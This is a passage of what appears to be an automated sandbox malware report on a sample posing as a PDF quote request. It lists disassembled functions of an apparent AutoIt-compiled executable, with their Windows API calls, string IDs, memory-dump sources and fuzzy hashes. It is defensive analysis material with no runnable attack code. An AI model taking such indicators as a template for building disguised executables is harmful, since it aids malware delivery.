                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                • API String ID: 9721498-966354055
                                                                                                                • Opcode ID: e2ce5b01f5dc62cdffd3359c81b4442619c695835a67c7a0c03faef6de186ee2
                                                                                                                • Instruction ID: 40223497726f8df3c110ee14b48843ba993623c72c63c410154fa04c4cde9503
                                                                                                                • Opcode Fuzzy Hash: e2ce5b01f5dc62cdffd3359c81b4442619c695835a67c7a0c03faef6de186ee2
                                                                                                                • Instruction Fuzzy Hash: FF1247356042119FDB14DF14C991F2AB7E5EF88724F05889DF89A9B3A2DB31ED41CB82
                                                                                                                Function 00AD091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00AD09C6
                                                                                                                • _wcslen.LIBCMT ref: 00AD0A01
                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AD0A54
                                                                                                                • _wcslen.LIBCMT ref: 00AD0A8A
                                                                                                                • _wcslen.LIBCMT ref: 00AD0B06
                                                                                                                • _wcslen.LIBCMT ref: 00AD0B81
                                                                                                                  • Part of subcall function 00A5F9F2: _wcslen.LIBCMT ref: 00A5F9FD
                                                                                                                  • Part of subcall function 00AA2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AA2BFA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                • API String ID: 1103490817-4258414348
                                                                                                                • Opcode ID: bbb7f2ee2bbb8ca018dfe7e26075ca13c29d0095bda3c09a564fa87979d6b7dd
                                                                                                                • Instruction ID: 49c443f658882ae13cfa77af2fc4cbd223da3740d9528bdaed55ee338221949e
                                                                                                                • Opcode Fuzzy Hash: bbb7f2ee2bbb8ca018dfe7e26075ca13c29d0095bda3c09a564fa87979d6b7dd
                                                                                                                • Instruction Fuzzy Hash: C5E18C366087019FC714DF24C550A2ABBE2FF98354F14895EF8969B3A2DB31ED45CB82
                                                                                                                Function 00ACC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                • API String ID: 1256254125-909552448
                                                                                                                • Opcode ID: 65a1567faac5e124328d0a7df98902f0b50076f8d5624ba16e78794b366c728c
                                                                                                                • Instruction ID: a144a1daae67312cd8d800e2657405fe73cc9995bec4792d98c61ed4ff015d22
                                                                                                                • Opcode Fuzzy Hash: 65a1567faac5e124328d0a7df98902f0b50076f8d5624ba16e78794b366c728c
                                                                                                                • Instruction Fuzzy Hash: 0A71C733A4452A8BCB10DF7C8951FBA77A2AB647B4B16052CF86E97284EA31DD45C390
                                                                                                                Function 00AD833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _wcslen.LIBCMT ref: 00AD835A
                                                                                                                • _wcslen.LIBCMT ref: 00AD836E
                                                                                                                • _wcslen.LIBCMT ref: 00AD8391
                                                                                                                • _wcslen.LIBCMT ref: 00AD83B4
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00AD83F2
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00AD5BF2), ref: 00AD844E
                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AD8487
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00AD84CA
                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AD8501
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00AD850D
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AD851D
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?,00AD5BF2), ref: 00AD852C
                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00AD8549
                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00AD8555
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                • API String ID: 799131459-1154884017
                                                                                                                • Opcode ID: 4450c388ee4490b6eeec1688b8fc02b18636091f5ff77813aeda4ef5f95c4de7
                                                                                                                • Instruction ID: 534a121190448c4701dea509527d6a904460ec09333913dc5f366cfba4d14c7c
                                                                                                                • Opcode Fuzzy Hash: 4450c388ee4490b6eeec1688b8fc02b18636091f5ff77813aeda4ef5f95c4de7
                                                                                                                • Instruction Fuzzy Hash: F461C171940215BAEB14DF64DC41BBF77B8BB08B21F10460AF916DA1D1DF78AA81C7A0
                                                                                                                Function 00A47778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                • API String ID: 0-1645009161
                                                                                                                • Opcode ID: fd486f005fd7be2a073d20b15708e07ceb7b90442a20294ffe084fffbb614386
                                                                                                                • Instruction ID: eb23726198533b79a1a28bb8646ed5fd5fad70ca7b52871c61a99f664f6dc2ef
                                                                                                                • Opcode Fuzzy Hash: fd486f005fd7be2a073d20b15708e07ceb7b90442a20294ffe084fffbb614386
                                                                                                                • Instruction Fuzzy Hash: A381EF75A00205BEDB20BF60CD42FAF7BB8BF95300F004425FC05AA292EBB5DA55C7A1
                                                                                                                Function 00AA5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(00000063), ref: 00AA5A2E
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00AA5A40
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00AA5A57
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00AA5A6C
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00AA5A72
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00AA5A82
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00AA5A88
                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00AA5AA9
                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00AA5AC3
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00AA5ACC
                                                                                                                • _wcslen.LIBCMT ref: 00AA5B33
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00AA5B6F
                                                                                                                • GetDesktopWindow.USER32 ref: 00AA5B75
                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AA5B7C
                                                                                                                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00AA5BD3
                                                                                                                • GetClientRect.USER32(?,?), ref: 00AA5BE0
                                                                                                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 00AA5C05
                                                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00AA5C2F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 895679908-0
                                                                                                                • Opcode ID: f160227c48a23945c1e3dd69357ed52469a9955edb366cd734a1ab07ca24dbad
                                                                                                                • Instruction ID: 3093052bf0b115c4120b85611bab962a3b1fc21497d619f5cdc7eee911be5458
                                                                                                                • Opcode Fuzzy Hash: f160227c48a23945c1e3dd69357ed52469a9955edb366cd734a1ab07ca24dbad
                                                                                                                • Instruction Fuzzy Hash: 58717E31A00B0AAFDB20DFB8CE85AAEBBF5FF48715F104519E142A35A0D775E944CB64
                                                                                                                Function 00A600C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00A600C6
                                                                                                                  • Part of subcall function 00A600ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00B1070C,00000FA0,C7DB6268,?,?,?,?,00A823B3,000000FF), ref: 00A6011C
                                                                                                                  • Part of subcall function 00A600ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00A823B3,000000FF), ref: 00A60127
                                                                                                                  • Part of subcall function 00A600ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00A823B3,000000FF), ref: 00A60138
                                                                                                                  • Part of subcall function 00A600ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00A6014E
                                                                                                                  • Part of subcall function 00A600ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A6015C
                                                                                                                  • Part of subcall function 00A600ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A6016A
                                                                                                                  • Part of subcall function 00A600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A60195
                                                                                                                  • Part of subcall function 00A600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A601A0
                                                                                                                • ___scrt_fastfail.LIBCMT ref: 00A600E7
                                                                                                                  • Part of subcall function 00A600A3: __onexit.LIBCMT ref: 00A600A9
                                                                                                                Strings
                                                                                                                • WakeAllConditionVariable, xrefs: 00A60162
                                                                                                                • kernel32.dll, xrefs: 00A60133
                                                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A60122
                                                                                                                • SleepConditionVariableCS, xrefs: 00A60154
                                                                                                                • InitializeConditionVariable, xrefs: 00A60148
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                • API String ID: 66158676-1714406822
                                                                                                                • Opcode ID: b6719f825b8a816f2857bd7ac270e9d5dfcc67326bdeb6a53601ed58b6148f74
                                                                                                                • Instruction ID: 5bd137737487d6280ed194a76c8fec184a328cd943dd7efbe0a93471de02b653
                                                                                                                • Opcode Fuzzy Hash: b6719f825b8a816f2857bd7ac270e9d5dfcc67326bdeb6a53601ed58b6148f74
                                                                                                                • Instruction Fuzzy Hash: 4421D7326457126FE710ABA4AC0AF6B33B5EB06B61F504626FC03D72D1DFB49C808A90
                                                                                                                Function 00AA30F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen
                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                • API String ID: 176396367-1603158881
                                                                                                                • Opcode ID: 2581ac03e9fe4791700c0894abb8e18706b95bf7d0b915427307ed50f6326df8
                                                                                                                • Instruction ID: cd322e88b6dc67b716ddb569e5de201bb32c848101cf28a4ba044bb9e33a17bc
                                                                                                                • Opcode Fuzzy Hash: 2581ac03e9fe4791700c0894abb8e18706b95bf7d0b915427307ed50f6326df8
                                                                                                                • Instruction Fuzzy Hash: 4EE1B333A00616AFCF249FB8C4516EEFBB4BF56710F548159F456A7280DB30AE899B90
                                                                                                                Function 00AB44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(00000000,00000000,00ADCC08), ref: 00AB4527
                                                                                                                • _wcslen.LIBCMT ref: 00AB453B
                                                                                                                • _wcslen.LIBCMT ref: 00AB4599
                                                                                                                • _wcslen.LIBCMT ref: 00AB45F4
                                                                                                                • _wcslen.LIBCMT ref: 00AB463F
                                                                                                                • _wcslen.LIBCMT ref: 00AB46A7
                                                                                                                  • Part of subcall function 00A5F9F2: _wcslen.LIBCMT ref: 00A5F9FD
                                                                                                                • GetDriveTypeW.KERNEL32(?,00B06BF0,00000061), ref: 00AB4743
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                • API String ID: 2055661098-1000479233
                                                                                                                • Opcode ID: dbe471935ea1e64f60605f57ed204dd4b62be4c18ad91e6e3305aa2d20837bc3
                                                                                                                • Instruction ID: f9c6c16229a244ee95435ded4e832656f4df131ff147011300ddda5f8cbee8ec
                                                                                                                • Opcode Fuzzy Hash: dbe471935ea1e64f60605f57ed204dd4b62be4c18ad91e6e3305aa2d20837bc3
                                                                                                                • Instruction Fuzzy Hash: B5B1C2756083029FC710DF28C991AAAB7E9BFA9760F504A1DF496C7293DB30DC85CB52
                                                                                                                Function 00ACAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _wcslen.LIBCMT ref: 00ACB198
                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00ACB1B0
                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00ACB1D4
                                                                                                                • _wcslen.LIBCMT ref: 00ACB200
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00ACB214
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00ACB236
                                                                                                                • _wcslen.LIBCMT ref: 00ACB332
                                                                                                                  • Part of subcall function 00AB05A7: GetStdHandle.KERNEL32(000000F6), ref: 00AB05C6
                                                                                                                • _wcslen.LIBCMT ref: 00ACB34B
                                                                                                                • _wcslen.LIBCMT ref: 00ACB366
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ACB3B6
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00ACB407
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00ACB439
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00ACB44A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00ACB45C
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00ACB46E
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00ACB4E3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2178637699-0
                                                                                                                • Opcode ID: cce1b3ae8657712a33e0d402a4b7a50bcef0751e59483da7eb94b85484becee7
                                                                                                                • Instruction ID: a1b3a5d80b246478d1e198c42e15e24bcfcc2a6817db425082859f1d3318c8a1
                                                                                                                • Opcode Fuzzy Hash: cce1b3ae8657712a33e0d402a4b7a50bcef0751e59483da7eb94b85484becee7
                                                                                                                • Instruction Fuzzy Hash: EDF18E315183409FC714EF24C992F6EBBE5AF85310F15895DF89A5B2A2DB31EC44CB62
                                                                                                                Function 00A4326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMenuItemCount.USER32(00B11990), ref: 00A82F8D
                                                                                                                • GetMenuItemCount.USER32(00B11990), ref: 00A8303D
                                                                                                                • GetCursorPos.USER32(?), ref: 00A83081
                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00A8308A
                                                                                                                • TrackPopupMenuEx.USER32(00B11990,00000000,?,00000000,00000000,00000000), ref: 00A8309D
                                                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A830A9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 36266755-4108050209
                                                                                                                • Opcode ID: e84c7b233728ed12f44ce463c249ed0b4de252c0508019001ceddc5d0e5da76e
                                                                                                                • Instruction ID: 9f61d8f2e127a25bef05e886ffa0792583b62c2242b039660fef3718e5de2b4f
                                                                                                                • Opcode Fuzzy Hash: e84c7b233728ed12f44ce463c249ed0b4de252c0508019001ceddc5d0e5da76e
                                                                                                                • Instruction Fuzzy Hash: CE713831640206BEEF219F64DD49FAABF74FF45724F204206F6256A1E1C7B1AD20DB50
                                                                                                                Function 00AD6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,?), ref: 00AD6DEB
                                                                                                                  • Part of subcall function 00A46B57: _wcslen.LIBCMT ref: 00A46B6A
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00AD6E5F
                                                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00AD6E81
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AD6E94
                                                                                                                • DestroyWindow.USER32(?), ref: 00AD6EB5
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A40000,00000000), ref: 00AD6EE4
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AD6EFD
                                                                                                                • GetDesktopWindow.USER32 ref: 00AD6F16
                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AD6F1D
                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AD6F35
                                                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00AD6F4D
                                                                                                                  • Part of subcall function 00A59944: GetWindowLongW.USER32(?,000000EB), ref: 00A59952
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
